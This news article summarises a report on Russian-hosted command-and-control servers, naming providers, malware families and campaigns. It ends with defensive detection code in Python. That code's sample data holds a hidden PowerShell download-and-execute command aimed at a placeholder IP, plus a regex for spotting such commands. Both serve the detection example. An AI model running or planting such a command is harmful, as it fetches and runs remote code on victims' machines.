Russian C2 Servers Mapped Across 165 Hosting Providers

Marcus Rodriguez
April 16, 2026

Key Takeaways

  • Over 1,250 active command-and-control (C2) servers were identified within Russian hosting environments.
  • These C2 servers are distributed across 165 different Russian hosting providers, including shared hosting, virtual servers, and telecommunication networks.
  • The infrastructure supports a wide range of malicious activities, from malware distribution and phishing to information stealing and botnet operations.
  • Key malware families leveraging this infrastructure include Keitaro, Hajime, Mozi, and Mirai, alongside offensive security frameworks like Cobalt Strike.
  • Multiple active campaigns, such as those distributing Latrodectus v2.3, Lumma Stealer, Remcos RAT, SHADOWSNIFF, SALATSTEALER, and BoryptGrab, are linked to this C2 network.

Cybersecurity experts have uncovered an extensive and organized network of malicious infrastructure operating largely undetected within Russia’s commercial hosting sector. This discovery highlights the deep entrenchment of cybercriminal operations within legitimate internet services.

During a three-month analysis period, from January 1 to April 1, 2026, researchers documented over 1,250 active command-and-control (C2) servers. These servers were found distributed across 165 distinct Russian infrastructure providers, encompassing shared hosting, virtual private servers, and various telecommunications networks, as detailed in a comprehensive report by Hunt.io analysts.

The Ubiquitous Threat of C2 Servers

C2 servers are critical components in most cyberattacks, serving as the communication hub for threat actors to issue commands to compromised systems and exfiltrate stolen data. The sheer volume of over 1,250 active C2 servers simultaneously residing within Russian hosting providers underscores the scale at which malicious infrastructure has integrated into mainstream commercial networks.

Crucially, these servers are not confined to a few isolated internet corners. Their widespread distribution across 165 different providers complicates detection and blocking efforts, allowing attackers to maintain their operations with greater anonymity and resilience.

Hunt.io analysts and researchers identified these patterns through their Host Radar intelligence module. This tool specializes in correlating C2 servers, phishing infrastructure, open malicious directories, and public indicators of compromise (IoCs) back to their underlying hosting providers. This methodology offers crucial provider-level visibility, transforming ephemeral IP addresses into actionable intelligence by revealing systematic patterns in how malicious infrastructure is deployed and reused across Russian hosting environments.

Across the entire dataset, Host Radar identified approximately 1,290 malicious artifacts during the observation period. C2 infrastructure constituted the vast majority, accounting for roughly 88.6% of all detected activity with 1,252 confirmed servers. Other malicious elements included open directories (5.3%), phishing sites (4.9%), and publicly reported indicators of compromise (1.2%).

Several hosting providers emerged as significant hosts for this illicit activity. TimeWeb led the list with 311 detected C2 servers over the 90-day period. Following closely were WebHost1 with 140, REG.RU with 138, VDSina with 86, and PROSPERO OOO with 80.

Malware Families and Active Campaigns

Utilizing their HuntSQL analytics platform, researchers queried telemetry data across Russian networks to pinpoint the malware families most frequently associated with C2 infrastructure. The findings revealed a diverse ecosystem of threats.

Keitaro, a traffic distribution system often exploited to redirect users to malware, dominated the dataset with 587 unique C2 IP addresses, representing the largest concentration observed. IoT-focused botnets also featured prominently, with Hajime linked to 191 C2 servers, and both Mozi and Mirai demonstrating ongoing abuse of compromised routers and embedded devices.

Offensive security frameworks repurposed for malicious intent were also detected, including Tactical RMM (87 endpoints), various Cobalt Strike variants (a combined 55 instances), Sliver, and Ligolo-ng. Furthermore, scanning and phishing tools such as Acunetix, Interactsh, and Gophish were identified, confirming that this infrastructure supports reconnaissance and credential theft in addition to direct intrusions.

Top 10 Malware Command-and-Control (C2) Families (Source - Hunt.io)

The gravity of these findings is underscored by active campaigns directly linked to this infrastructure. One notable campaign leveraging JSC TIMEWEB infrastructure employed a deceptive CAPTCHA technique called “ClickFix.” This method tricked users into executing a PowerShell command, leading to the download of Latrodectus v2.3 malware, which then communicated with attacker-controlled domains.

Infrastructure hosted by REG.RU was implicated in a Lumma Stealer operation. This campaign exploited Google Groups redirectors to distribute malicious archives targeting both Windows and Linux systems. On Hosting Technology LTD infrastructure, the SmartApeSG campaign deployed the Remcos RAT through fake CAPTCHA prompts on compromised websites, achieving persistence via DLL sideloading.

Beget LLC infrastructure was tied to the UAC-0252 campaign. This operation involved impersonating Ukrainian government institutions and deploying SHADOWSNIFF and SALATSTEALER infostealers by exploiting a WinRAR vulnerability, tracked as CVE-2025-8088.

Top ISPs hosting malware (Source - Hunt.io)

Separately, Proton66 OOO infrastructure was connected to a BoryptGrab infostealer operation that abused over 100 public GitHub repositories through SEO manipulation tactics.

What You Should Do

  • Prioritize Provider-Level Monitoring: Treat monitoring hosting providers, especially those with high C2 activity like TimeWeb, REG.RU, WebHost1, VDSina, and PROSPERO OOO, as a core defensive priority.
  • Monitor Outbound Connections: Implement strict monitoring for outbound connections to Russian Autonomous System Numbers (ASNs) known to host C2 activity.
  • Enhance Threat Intelligence: Integrate threat intelligence that covers infrastructure-level indicators, beyond just traditional file hashes, to detect emerging threats more effectively.
  • Restrict PowerShell Chains: Implement controls to restrict or block ‘curl-to-PowerShell’ chains, which are frequently exploited by ClickFix-style lures and similar attack vectors.
  • Maintain IoT/Edge Device Visibility: Ensure comprehensive visibility and security measures for IoT and edge devices, given the persistent activity of botnets like Hajime, Mozi, and Mirai.
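As an added illustration of the provider-level correlation Host Radar performs and of the first, second and fourth recommendations above, the Python below is example detection logic written for this article, not code or data from Hunt.io. The flow and process-creation records are constructed, the watchlist is built from the providers the report names, and the download-cradle pattern is an assumption about what a ClickFix-style PowerShell command line looks like.

```python
import re
from collections import Counter

# Constructed sample telemetry (not from Hunt.io): outbound flows already
# enriched with the destination's hosting organisation, plus process-creation
# events from two workstations. All addresses are RFC 5737 documentation IPs.
FLOWS = [
    {"src": "10.0.0.5", "dst": "203.0.113.10", "org": "TimeWeb"},
    {"src": "10.0.0.5", "dst": "203.0.113.11", "org": "TimeWeb"},
    {"src": "10.0.0.9", "dst": "198.51.100.7", "org": "REG.RU"},
    {"src": "10.0.0.12", "dst": "192.0.2.44", "org": "ExampleCDN"},
]
PROCESSES = [
    {"host": "ws-01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell -w hidden -c "iwr http://198.51.100.7/a | iex"'},
    {"host": "ws-02", "parent": "code.exe", "image": "powershell.exe",
     "cmd": "powershell -File C:\\build\\deploy.ps1"},
]

# Providers the report lists with the most C2 servers (assumption: a defender
# would maintain this watchlist from threat intelligence, not from one article).
WATCHLIST = {"TimeWeb", "WebHost1", "REG.RU", "VDSina", "PROSPERO OOO"}

# Assumed download-and-execute shape of a ClickFix lure: a web fetch piped or
# chained into invoke-expression inside a single PowerShell command line.
CRADLE = re.compile(
    r"(iwr|invoke-webrequest|curl|wget|downloadstring)[^|;]*[|;]\s*(iex|invoke-expression)",
    re.I)

def flows_by_watchlisted_org(flows):
    """Count outbound flows per watchlisted hosting organisation."""
    return Counter(f["org"] for f in flows if f["org"] in WATCHLIST)

def suspicious_powershell(events):
    """Hosts where PowerShell ran a download cradle from an interactive parent
    (shell or browser), the launch path a user-pasted ClickFix command takes."""
    interactive = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
    return [e["host"] for e in events
            if e["image"].lower() == "powershell.exe"
            and e["parent"].lower() in interactive
            and CRADLE.search(e["cmd"])]

def correlate(events, flows):
    """Join flagged PowerShell events to the hosting organisation of any IP
    named in the command line, giving provider-level context to the alert."""
    org_of = {f["dst"]: f["org"] for f in flows}
    hits = []
    for e in events:
        if e["host"] in suspicious_powershell([e]):
            for ip in re.findall(r"\d{1,3}(?:\.\d{1,3}){3}", e["cmd"]):
                hits.append((e["host"], ip, org_of.get(ip, "unknown")))
    return hits
```

In practice the `org` field would come from ASN or WHOIS enrichment of the destination IP, and the watchlist would be refreshed from a feed rather than hard-coded.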
